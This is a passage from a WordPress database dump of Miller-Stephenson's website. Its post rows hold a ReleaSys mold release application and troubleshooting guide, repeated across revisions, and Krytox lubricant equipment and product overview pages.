touch-ups can also be done on known high wear or geometrically strained areas.</li>\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\n</ol>\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\n\n<table style="height: 634px;" width="1068">\n<tbody>\n<tr>\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 105%;"><strong>Complete <span style="background-color: #ffffff;">failure </span>to obtain release</strong></span></td>\n<td><span style="color: #ff0000;">›</span><span style="font-size: 105%;">Improperly cured ReleaSys</span></td>\n<td><span style="font-size: 105%;">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\n<td><span style="font-size: 105%;">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\n<td><span style="font-size: 105%;">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\n</tr>\n<tr>\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\n</tr>\n<tr>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\n</tr>\n<tr>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\n</tr>\n<tr>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\n</tr>\n<tr>\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;\n\n&nbsp;\n\n[ux_product_categories ids="21,16" number="10"]\n<h3>Technical or Application Support:</h3>\n<ul>\n 	<li>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></li>\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\n</ul>\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide - ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2694-autosave-v1', '', '', '2016-11-09 17:34:40', '2016-11-09 17:34:40', '', 2694, 'https://www.miller-stephenson.com/2694-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2976, 154, '2016-11-09 17:24:13', '2016-11-09 17:24:13', '', '', '', 'publish', 'closed', 'closed', '', '2976', '', '', '2016-11-09 17:24:13', '2016-11-09 17:24:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/2976/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2977, 2, '2016-11-09 17:35:12', '2016-11-09 17:35:12', '<h1 data-canvas-width="370.56179999999995"><strong>Mold Release Application Guide -  ReleaSys™ </strong></h1>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n\r\n<h4><span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span></h4>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n\r\n<h4><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span></h4>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<h4 style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></h4>\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<h4 style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></h4>\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 105%;"><strong>Complete <span style="background-color: #ffffff;">failure </span>to obtain release</strong></span></td>\r\n<td><span style="color: #ff0000;">›</span><span style="font-size: 105%;">Improperly cured ReleaSys</span></td>\r\n<td><span style="font-size: 105%;">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\r\n<td><span style="font-size: 105%;">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\r\n<td><span style="font-size: 105%;">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide - ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-11-09 17:35:12', '2016-11-09 17:35:12', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2978, 2, '2016-11-09 18:30:59', '2016-11-09 18:30:59', '<h1><strong>Krytox Equipment Selection</strong></h1>\r\n<h4><strong>Lubrication Equipment</strong></h4>\r\nKrytox™ grease has been used successfully in many types of grease guns and pumps. Generally, any lubrication equipment manufacturer’s gun or pump that fits a standard grease cartridge or grease bucket should work.\r\n\r\nAlthough Chemours does not supply any pumps, guns, or grease fittings, there are many manufacturers of grease equipment. Two full service industrial manufacturers located in the United States are Lincoln and Alemite. Krytox™ grease has also been used successfully in single or multi-point auto lubers, such as those manufactured by Perma or other similar auto lubrication systems.\r\n\r\nManufacturers of lubrication equipment operate in most countries, and their equipment should work well if it fits standard containers. There is no performance advantage in using any specific manufacturer’s equipment, so the choice of guns or pumps should be based on the local supplier’s ability to deliver the equipment when needed.\r\n<h4><strong>Equipment Grades</strong></h4>\r\nVarious grades of equipment are available. For longer life and more consistent performance, an industrial grade hand grease gun should be chosen over lighter weight, hobby-quality grease guns. Different pressures\r\nand volumes of grease can be delivered from each type of gun, so the exact capacity of each gun should be determined before use to ensure that a bearing is not over- or under-filled.\r\n\r\nLubricating equipment is often tested with hydrocarbon greases; so, to avoid contamination, the equipment must be cleaned before adding Krytox™ grease.\r\n\r\nA Krytox™ grease gun cartridge is the same size as a standard hydrocarbon cartridge, but because of the grease density difference, a Krytox™ grease cartridge weighs twice as much (1.75 lb vs. 14 oz [800 g vs. 400 g]). Krytox™ grease is also packed into 5-gal pails that are the standard size for hand- and air-powered pumps. Again, because of the higher density of Krytox™ grease, a pump that is listed as fitting 35-lb pails will fit a standard Krytox™ grease bucket. Larger quantities of grease are also packed into 55-gal drums that are sized for larger pumps.\r\n<h4><strong>Grease Fittings</strong></h4>\r\nKrytox™ grease has been used in many types of grease fittings. The most common standard grease fitting has a spherical head and is often called a zerk or bullneck. This is the standard that is supplied with autos and industrial equipment. Because Krytox™ is often used in special applications and can be near fittings that receive standard lubricants, special fittings such as pin type or button head are recommended for use. Note, when special fittings are used, the regular grease gun cannot hook onto the fitting. This keeps the equipment that has been lubricated with Krytox™ grease from being accidentally contaminated with other types of lubricants. Special fittings also require the use of a separate grease gun having an adapter that is compatible with the type of fitting used. It is also a good practice to label the guns and lubrication points with a tag\r\nthat indicates only Krytox™ grease is to be used.\r\n\r\nGrease fittings have a built-in check valve to keep the grease in the equipment. If grease is observed oozing out after the re-lubrication, it usually means the check valve has failed and the fitting should be replaced. Before coupling the grease gun up to a fitting that has been in use, the fitting should be wiped to remove any dirt that has accumulated. If this is not done, the new grease will force the dirt into the fitting and bearing, and can cause premature failure.', 'Krytox - Equipment Selection for Applying Krytox™ Lubricants', '', 'publish', 'closed', 'closed', '', 'krytox-equipment-selection', '', '', '2016-11-09 18:31:08', '2016-11-09 18:31:08', '', 0, 'https://www.miller-stephenson.com/?p=2978', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2979, 2, '2016-11-09 18:27:43', '2016-11-09 18:27:43', '', 'Krytox Equipment Selection', '', 'inherit', 'closed', 'closed', '', 'shutterstock_275163272', '', '', '2016-11-09 18:30:17', '2016-11-09 18:30:17', '', 2978, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_275163272.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2980, 2, '2016-11-09 18:30:59', '2016-11-09 18:30:59', '<h1><strong>Krytox Equipment Selection</strong></h1>\r\n<h4><strong>Lubrication Equipment</strong></h4>\r\nKrytox™ grease has been used successfully in many types of grease guns and pumps. Generally, any lubrication equipment manufacturer’s gun or pump that fits a standard grease cartridge or grease bucket should work.\r\n\r\nAlthough Chemours does not supply any pumps, guns, or grease fittings, there are many manufacturers of grease equipment. Two full service industrial manufacturers located in the United States are Lincoln and Alemite. Krytox™ grease has also been used successfully in single or multi-point auto lubers, such as those manufactured by Perma or other similar auto lubrication systems.\r\n\r\nManufacturers of lubrication equipment operate in most countries, and their equipment should work well if it fits standard containers. There is no performance advantage in using any specific manufacturer’s equipment, so the choice of guns or pumps should be based on the local supplier’s ability to deliver the equipment when needed.\r\n<h4><strong>Equipment Grades</strong></h4>\r\nVarious grades of equipment are available. For longer life and more consistent performance, an industrial grade hand grease gun should be chosen over lighter weight, hobby-quality grease guns. Different pressures\r\nand volumes of grease can be delivered from each type of gun, so the exact capacity of each gun should be determined before use to ensure that a bearing is not over- or under-filled.\r\n\r\nLubricating equipment is often tested with hydrocarbon greases; so, to avoid contamination, the equipment must be cleaned before adding Krytox™ grease.\r\n\r\nA Krytox™ grease gun cartridge is the same size as a standard hydrocarbon cartridge, but because of the grease density difference, a Krytox™ grease cartridge weighs twice as much (1.75 lb vs. 14 oz [800 g vs. 400 g]). Krytox™ grease is also packed into 5-gal pails that are the standard size for hand- and air-powered pumps. Again, because of the higher density of Krytox™ grease, a pump that is listed as fitting 35-lb pails will fit a standard Krytox™ grease bucket. Larger quantities of grease are also packed into 55-gal drums that are sized for larger pumps.\r\n<h4><strong>Grease Fittings</strong></h4>\r\nKrytox™ grease has been used in many types of grease fittings. The most common standard grease fitting has a spherical head and is often called a zerk or bullneck. This is the standard that is supplied with autos and industrial equipment. Because Krytox™ is often used in special applications and can be near fittings that receive standard lubricants, special fittings such as pin type or button head are recommended for use. Note, when special fittings are used, the regular grease gun cannot hook onto the fitting. This keeps the equipment that has been lubricated with Krytox™ grease from being accidentally contaminated with other types of lubricants. Special fittings also require the use of a separate grease gun having an adapter that is compatible with the type of fitting used. It is also a good practice to label the guns and lubrication points with a tag\r\nthat indicates only Krytox™ grease is to be used.\r\n\r\nGrease fittings have a built-in check valve to keep the grease in the equipment. If grease is observed oozing out after the re-lubrication, it usually means the check valve has failed and the fitting should be replaced. Before coupling the grease gun up to a fitting that has been in use, the fitting should be wiped to remove any dirt that has accumulated. If this is not done, the new grease will force the dirt into the fitting and bearing, and can cause premature failure.', 'Krytox - Equipment Selection for Applying Krytox™ Lubricants', '', 'inherit', 'closed', 'closed', '', '2978-revision-v1', '', '', '2016-11-09 18:30:59', '2016-11-09 18:30:59', '', 2978, 'https://www.miller-stephenson.com/2978-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2981, 2, '2016-11-09 18:54:33', '2016-11-09 18:54:33', '<h3>Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a 